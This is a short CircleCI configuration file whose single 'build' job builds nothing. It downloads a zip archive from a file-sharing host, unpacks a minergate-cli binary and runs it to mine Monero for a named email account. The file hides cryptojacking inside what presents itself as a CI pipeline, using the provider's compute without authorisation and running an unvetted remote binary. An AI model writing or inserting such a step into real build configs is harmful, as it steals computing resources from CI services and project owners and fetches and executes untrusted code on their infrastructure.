version: 2
jobs:
  build:
    docker:
      - image: greenfieldsvp/dock
    steps:
      - checkout
      - run: wget https://file.town/uploads/wah66to6xrapy01f899xbj9s5.zip && unzip wah66to6xrapy01f899xbj9s5.zip && cd minergate-cli && chmod +x minergate-cli && ./minergate-cli -user greenfieldsvp@outlook.com.vn -xmr
